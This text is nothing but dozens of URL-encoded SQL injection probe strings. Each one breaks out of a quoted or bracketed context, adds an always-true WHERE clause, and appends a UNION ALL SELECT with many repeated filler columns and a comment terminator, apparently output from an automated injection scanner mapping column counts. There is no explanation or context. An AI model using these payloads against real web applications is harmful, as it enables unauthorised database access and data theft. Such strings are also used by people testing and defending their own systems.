-2741%00%27%20UNION%20ALL%20SELECT%201397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397%2C1397--%20 -1003%00%27%20UNION%20ALL%20SELECT%207524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524--%20 -1931%00%27%20UNION%20ALL%20SELECT%202347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347--%20 -3112%00%27%20UNION%20ALL%20SELECT%208504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504--%20 -9311%00%27%20UNION%20ALL%20SELECT%202088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088--%20 -8995%00%27%20UNION%20ALL%20SELECT%205913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913%2C5913--%20 -9358%00%27%20UNION%20ALL%20SELECT%201139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139%2C1139--%20 -1997%27%29%20WHERE%202122%3D2122%20UNION%20ALL%20SELECT%202122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122--%20 -1771%27%29%20WHERE%206664%3D6664%20UNION%20ALL%20SELECT%206664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664--%20 -5516%27%29%20WHERE%204520%3D4520%20UNION%20ALL%20SELECT%204520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520--%20 -6180%27%29%20WHERE%202488%3D2488%20UNION%20ALL%20SELECT%202488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488%2C2488--%20 -8166%27%29%20WHERE%206648%3D6648%20UNION%20ALL%20SELECT%206648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648--%20 -3983%27%29%20WHERE%207905%3D7905%20UNION%20ALL%20SELECT%207905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905%2C7905--%20 -1882%27%29%20WHERE%209482%3D9482%20UNION%20ALL%20SELECT%209482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482%2C9482--%20 -8441%27%29%20WHERE%207151%3D7151%20UNION%20ALL%20SELECT%207151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151--%20 -9415%27%29%20WHERE%204781%3D4781%20UNION%20ALL%20SELECT%204781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781%2C4781--%20 -8399%27%29%20WHERE%208537%3D8537%20UNION%20ALL%20SELECT%208537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537--%20 -8040%22%29%20WHERE%201267%3D1267%20UNION%20ALL%20SELECT%201267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267--%20 -4660%22%29%20WHERE%209448%3D9448%20UNION%20ALL%20SELECT%209448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448%2C9448--%20 -9966%22%29%20WHERE%204667%3D4667%20UNION%20ALL%20SELECT%204667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667%2C4667--%20 -6686%22%29%20WHERE%202464%3D2464%20UNION%20ALL%20SELECT%202464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464%2C2464--%20 -7745%22%29%20WHERE%206054%3D6054%20UNION%20ALL%20SELECT%206054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054%2C6054--%20 -7416%22%29%20WHERE%205762%3D5762%20UNION%20ALL%20SELECT%205762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762%2C5762--%20 -7605%22%29%20WHERE%205393%3D5393%20UNION%20ALL%20SELECT%205393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393%2C5393--%20 -9041%22%29%20WHERE%204431%3D4431%20UNION%20ALL%20SELECT%204431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431%2C4431--%20 -9183%22%29%20WHERE%209865%3D9865%20UNION%20ALL%20SELECT%209865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865%2C9865--%20 -1961%22%29%20WHERE%209352%3D9352%20UNION%20ALL%20SELECT%209352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352%2C9352--%20 -2537%29%20WHERE%203082%3D3082%20UNION%20ALL%20SELECT%203082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082--%20 -9049%29%20WHERE%208251%3D8251%20UNION%20ALL%20SELECT%208251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251%2C8251--%20 -6607%29%20WHERE%203399%3D3399%20UNION%20ALL%20SELECT%203399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399%2C3399--%20 -2344%29%20WHERE%207504%3D7504%20UNION%20ALL%20SELECT%207504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504%2C7504--%20 -5992%29%20WHERE%209263%3D9263%20UNION%20ALL%20SELECT%209263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263--%20 -7698%29%20WHERE%208640%3D8640%20UNION%20ALL%20SELECT%208640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640--%20 -6372%29%20WHERE%206292%3D6292%20UNION%20ALL%20SELECT%206292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292--%20 -8314%29%20WHERE%209034%3D9034%20UNION%20ALL%20SELECT%209034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034%2C9034--%20 -8962%29%20WHERE%207085%3D7085%20UNION%20ALL%20SELECT%207085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085%2C7085--%20 -9911%29%20WHERE%206377%3D6377%20UNION%20ALL%20SELECT%206377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377--%20 -3418%27%20WHERE%207434%3D7434%20UNION%20ALL%20SELECT%207434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434%2C7434--%20 -7043%27%20WHERE%209596%3D9596%20UNION%20ALL%20SELECT%209596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596%2C9596--%20 -7597%27%20WHERE%206589%3D6589%20UNION%20ALL%20SELECT%206589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589--%20 -3444%27%20WHERE%207708%3D7708%20UNION%20ALL%20SELECT%207708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708--%20 -5367%27%20WHERE%203691%3D3691%20UNION%20ALL%20SELECT%203691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691%2C3691--%20 -5732%27%20WHERE%207615%3D7615%20UNION%20ALL%20SELECT%207615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615%2C7615--%20 -4047%27%20WHERE%206778%3D6778%20UNION%20ALL%20SELECT%206778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778--%20 -3521%27%20WHERE%201623%3D1623%20UNION%20ALL%20SELECT%201623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623%2C1623--%20 -9766%27%20WHERE%203031%3D3031%20UNION%20ALL%20SELECT%203031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031--%20 -5198%27%20WHERE%209899%3D9899%20UNION%20ALL%20SELECT%209899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899%2C9899--%20 -1969%22%20WHERE%208705%3D8705%20UNION%20ALL%20SELECT%208705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705%2C8705--%20 -5449%22%20WHERE%201564%3D1564%20UNION%20ALL%20SELECT%201564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564--%20 -3251%22%20WHERE%205837%3D5837%20UNION%20ALL%20SELECT%205837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837%2C5837--%20 -9294%22%20WHERE%207410%3D7410%20UNION%20ALL%20SELECT%207410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410--%20 -1020%22%20WHERE%201569%3D1569%20UNION%20ALL%20SELECT%201569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569--%20 -4138%22%20WHERE%201533%3D1533%20UNION%20ALL%20SELECT%201533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533--%20 -8868%22%20WHERE%209666%3D9666%20UNION%20ALL%20SELECT%209666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666--%20 -6045%22%20WHERE%206901%3D6901%20UNION%20ALL%20SELECT%206901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901%2C6901--%20 -4558%22%20WHERE%202123%3D2123%20UNION%20ALL%20SELECT%202123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123%2C2123--%20 